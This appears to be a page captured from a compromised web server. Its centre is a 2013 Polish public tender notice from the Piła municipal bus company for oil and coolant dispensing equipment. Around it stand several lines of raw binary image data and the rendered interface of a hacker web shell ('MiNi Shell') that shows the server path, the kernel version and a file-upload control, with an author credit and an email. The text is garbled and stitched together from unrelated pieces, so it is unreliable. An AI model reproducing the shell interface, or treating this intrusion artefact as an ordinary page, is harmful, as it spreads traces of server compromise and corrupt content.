JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130710/139221-N-2013.html

<p class="kh_header"><b>Piła: Dostawa urządzeń  dystrybucji olejów i płynów chłodzących dla zaplecza warsztatowego obsługi autobusów miejskich.</b><br>
<b>Numer ogłoszenia: 139221 - 2013; data zamieszczenia: 10.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Komunikacji Spółka z ograniczoną odpowiedzialnością w Pile , ul. Łączna 4, 64-920 Piła, woj. wielkopolskie, tel. 067 2129701, faks 067 2139702.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa urządzeń  dystrybucji olejów i płynów chłodzących dla zaplecza warsztatowego obsługi autobusów miejskich..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i zamontowanie urządzeń dystrybucji olejów i płynów chłodzących dla zaplecza warsztatowego Zamawiającego. Urządzenia  przeznaczone do dystrybucji 6 rodzajów olejów (silnikowe, przekładniowe), 2 rodzajów płynów chłodzących oraz płynu Ad Blue oraz zlewania oleju przepracowanego.  System monitorowania dystrybucji.  Urządzenia i funkcje urządzeń: 

A. Dystrybucja świeżego oleju i płynów.

1. Wieża  montażowa w formie zabudowy bramowej otwartej dla 8 zwijadeł wyposażona w wannę ociekową. Szerokość wieży nie większa niż  700 mm, długość nie większa niż  3000 mm. Wieża ma umożliwiać łatwy dostęp do pistoletów nalewczych z obu stron (rozwinięcie węża w dwu kierunkach). 
2. Osiem zwijadeł zamkniętych  z wężem o długości 15 m z wyposażeniem, w tym:
- 5 zwijadeł zamkniętych  z wężami przeznaczonymi do dystrybucji olejów silnikowych, kompletacja: zawór odcinający, filtr, pistolet nalewczy wyposażony w przepływomierz z wyświetlaczem cyfrowym, 
- 2 zwijadła zamknięte z wężami przeznaczonymi do dystrybucji płynów chłodzących, kompletacja: zawór odcinający, filtr, pistolet nalewczy wyposażony w przepływomierz z wyświetlaczem cyfrowym, 
- 1 zwijadło zamknięte przeznaczone  do  dystrybucji płynu Ad Blue, kompletacja: zawór odcinający, filtr, pistolet nalewczy z końcówką skośną wyposażony w przepływomierz z wyświetlaczem cyfrowym.
3. Magistrala olejowa łącząca stanowisko dystrybucji olejów i płynów na hali warsztatowej z   magazynem olejów. Magistrala prowadzona w posadzce, z hali warsztatowej (według schematu - załącznik 6).
W magazynie olejów wykonanie magistrali łączeniowej do stanowisk beczek i pojemników,  wyposażenie końcówek instalacji pneumatycznej Zamawiającego (ciśnienie w układzie 9 atm.) w odpowiednie urządzenia sterowania ciśnieniem powietrza i uzdatniania (reduktory,  naolejacze) dostosowane do urządzeń oferowanych przez Wykonawcę i zapewniające spełnienie warunków prawidłowej pracy.
4. Wyposażenie magazynu olejów i płynów:
a. cztery  stanowiska w postaci wanien wychwytowych z kratami dla dziesięciu beczek o pojemności 200l (układ stanowisk: 4 beczki usytuowane w rzędzie, oraz 3 stanowiska po 2 beczki) - wymagana ta sama wysokość  i szerokość wanien umożliwiająca modułowe zestawienie; wysokość wanien  do 400 mm, możliwość podjazdu do wanny wózkiem do beczek aoferowanym przez Wykonawcę  (podpunkt 4 b),
b. wózek do transportowania i podnoszenia beczek o pojemności 200 litrów, wózek musi umożliwiać łatwe usytuowanie beczki na wannie - obsługa przez jednego pracownika,
c. pięć stanowisk pomp pneumatycznych do olejów (beczka 200 l - alternatywnie, możliwość zastosowania także do zbiornika 1000 l), pompy mocowane na ścianie przy stanowiskach beczek: pompa o wydajności minimum 18 litrów / minutę, wyposażenie w przyłącza do beczki i do instalacji magistrali olejowej, zawór odcinający, oferowana pompa i wyposażenie musi zapewniać prawidłową współpracę z pozostałymi elementami dystrybucji olejów i płynów oraz monitoringiem,
d. dwa stanowiska pomp pneumatycznych do płynów  (1 stanowisko: zbiornik 1000 l, drugie stanowisko beczka 200 l), pompy mocowane na ścianie przy stanowiskach pojemników 1000 litrów i beczkach: pompa o wydajności około 25 litrów na minutę, wyposażenie w przyłącza do zbiornika 1000 litrów  i beczek 200 l,  instalacji magistrali olejowej (płynu), zawór odcinający, oferowane pompy i wyposażenie muszą zapewniać prawidłową współpracę z pozostałymi elementami dystrybucji olejów i płynów oraz monitoringiem,
e. jedno stanowisko: pompa pneumatyczna dostosowana do Ad Blue (zbiornik 1000 l), pompa mocowana na ścianie przy stanowisku pojemników  1000 litrów: pompa o wydajności około 40 litrów na minutę, wyposażenie w przyłącza do zbiornika 1000 litrów i do instalacji magistrali płynu, zawór odcinający, oferowana pompa i wyposażenie musi zapewniać prawidłową współpracę z pozostałymi elementami dystrybucji olejów i płynów oraz monitoringiem.
B. Zlewanie oleju przepracowanego.
1. Wanna  do zużytego oleju jeżdżąca po obrzeżu kanału naprawczego (szerokość kanału 1000 mm, szerokość obrzeża z każdej strony 100 mm). Wanna wyposażona w chwytacz (siatkę) oraz zawór i szybkozłącze do podłączenia pompy do oleju przepracowanego.  Pojemność wanny minimum 100 litrów, maksymalnie 120 litrów.
2. Pompa do przepompowania zużytego oleju z wanny usytuowanej na kanałowym stanowisku naprawczym 2 (załącznik 1) poprzez instalację rurową do zbiornika na zużyty olej w magazynie olejów.  Usytuowanie pompy przy  miejscu wpustu instalacji do kanału (koniec kanału przy stanowisku naprawczym nr 2). Pompa wyposażona w przyłącza do wanny oraz zawory odcinające. Wyposażenie  przyłącza instalacji pneumatycznej  Zamawiającego (ciśnienie w układzie  9 atm.) w odpowiednie urządzenie sterowania ciśnieniem powietrza i uzdatniania (reduktor,  naolejacz) dostosowane do oferowanego urządzenia, zapewniające spełnienie warunków jego prawidłowej pracy. Wydajność pompy około 40 litrów na minutę.
3. Magistrala oleju zużytego łącząca stanowisko mocowania pompy oleju zużytego w kanale z zbiornikiem oleju zużytego w magazynie olejów. 
4. Zbiornik oleju zużytego o pojemności 2000 litrów. Zbiornik dwupłaszczowy. Wymiary zewnętrzne umożliwiające łatwe usytuowanie w magazynie olejów (załącznik 1, wysokość nie większa niż 1500 mm, szerokość nie większa niż 1300 mm, długość nie większa niż 2700 mm). Zbiornik wyposażony we wskaźnik sygnalizujący napełnienie zbiornika (sygnalizator dźwiękowy,  lampka ostrzegawcza). 
5. Wysysarko - ściekarka  zasilana pneumatycznie. Pojemność wanny zlewowej minimum 35  litrów, pojemność zbiornika na zużyty olej minimum 110 litrów. Wanna na pantografie (umożliwienie opuszczenia wanny, na poziom podłoża, z kółkami ułatwiającymi podjazd pod pojazd). Zestaw sond do odsysania oleju umożliwiających obsługę autobusów Solaris, Mercedes, Neoplan.  Opróżnienie zbiornika pneumatyczne. 
C. System monitorowania dystrybucji oleju.  
Wyposażenie zamontowanych urządzeń do dystrybucji olejów i płynów chłodzących  w system monitorowania. 
1. System musi spełniać następujące warunki:
a. Czytnik kart lub żetonów chipowych usytuowany na  hali warsztatu, na wieży dystrybucji olejów. Terminal z klawiaturą do wprowadzania numerów pojazdów usytuowany przy czytniku. 
b. Wydanie oleju może nastąpić tylko po zbliżeniu przez pracownika do czytnika ważnej, indywidualnej karty lub żetonu i wprowadzeniu do terminala wymaganych danych (numer boczny autobusu). System musi zidentyfikować ważność karty (żetonu) pracownika i prawidłowość wprowadzonych danych (prawidłowość numeru pojazdu -  dostępność w bazie systemu).  
c. Kontrola stanów oleju w zbiornikach - po przekroczeniu minimalnych stanów oleju w zbiorniku blokada wydania oleju (zabezpieczenie przed zapowietrzeniem i pracą pompy - na sucho).
d. System musi być wyposażony w program działający w środowisku Windows przeznaczony do gospodarki  olejami, w tym: bazę danych rejestrującą wszystkie transakcje, zestawienie transakcji, z podziałem na pracownika, pojazd, oleje, czas (data, godzina).  Wskazanie bieżących ilości olejów i płynów w zbiornikach. Program musi posiadać możliwość eksportu wybranych danych programu w formie pliku możliwego do odczytania w programie Excel. 
W ramach zamówienia Wykonawca dostarczy program, zainstaluje go na wskazanym komputerze Zamawiającego i uruchomi. Preferowane jest połączenie modułu sterowania systemem  z komputerem za pomocą łączności bezprzewodowej (zasięg - pomieszczenia biurowe umieszczone przy głównej hali warsztatu). W przypadku braku możliwości takiego połączenia Wykonawca wykona stosowną instalację w tym zakresie (do biura warsztatu).
e. Zmiany w ustawieniach systemu możliwe do wprowadzenia jedynie przez uprawnionych pracowników Zamawiającego (preferowane rozwiązanie -  z poziomu programu do gospodarki olejami). System musi posiadać zabezpieczenie przez nieuprawnioną ingerencją, zmianami danych. 
f. Wykonawca dostarczy 50 kart (żetonów), które Zamawiający będzie mógł indywidualnie przypisać w systemie do pracowników.  System musi umożliwiać  wykonywanie Zamawiającemu samodzielnych  zmian w tym zakresie - wielokrotne wykorzystanie (przypisanie) pojedynczej karty (żetonu) do  różnych pracowników. 

Inne: 
1. Wykonawca w ramach niniejszego zamówienia zapewni:
a) serwis oferowanych urządzeń - czas przybycia serwisu i podjęcie naprawy  w 24 godziny od zgłoszenia (wymagane oświadczenie w tym zakresie          w ofercie). 
b) przeszkolenie trzech pracowników Zamawiającego do obsługi systemu gospodarki olejami,
c) przeszkolenie dziesięciu pracowników zaplecza warsztatowego Zamawiającego w zakresie obsługi dystrybucji olejów (pobieranie olejów, posługiwanie się kartami, żetonami),
d) przeszkolenie  dwóch pracowników Zamawiającego w zakresie konserwacji  i obsługi urządzeń. 
2. Wykonawca jest zobowiązany dostarczyć:
e) instrukcję obsługi urządzeń i systemu w języku polskim;
f) kartę gwarancyjną, 
g) opis warunków gwarancji oraz informacje o częstotliwości przeglądów gwarancyjnych;
h) dokumentację techniczno - ruchową z wykazem katalogowym części zamiennych  w języku polskim (dopuszcza się  w wersji elektronicznej).
3. Wykonawca dostarczy przedmiot zamówienia do siedziby Zamawiającego mieszczącej się w Pile, ul. Łączna 4,  na swój koszt i ryzyko, w ramach zamówienia dokona montażu urządzeń  w budynku zaplecza warsztatowego i uruchomienia systemu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 42.50.00.00-1, 51.21.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy - załącznik nr 1 do SIWZ.
2. Pełnomocnictwo do reprezentowania w postępowaniu, ( w przypadku podmiotów 
3. Projekt umowy- załącznik nr 5.
4. Dane techniczne i opis oferowanych urządzeń,
5 Dokładny opis działania systemu monitoringu potwierdzający spełnienie warunków SIWZ,
6. Propozycję w zakresie kolorystyki urządzeń.
7. Oświadczenie - załącznik nr 7.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Okres gwarancji - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) wystąpienia zdarzeń niezależnych od Stron umowy, powodujących potrzebę wprowadzenia do treści umowy zmian neutralnych lub korzystnych dla Zamawiającego;
2) wszelkich zmian, których Zamawiający nie jest w stanie przewidzieć, a które będą związane z wdrożeniem innego systemu nabywania biletów komunikacji miejskiej.
Zmiany do umowy do swej ważności będą wymagały formy pisemnej w postaci aneksu podpisanego przez obie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.mzk.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> bip.mzk.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2013 godzina 08:15, miejsce: siedziba Zamawiającego pok. 5, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com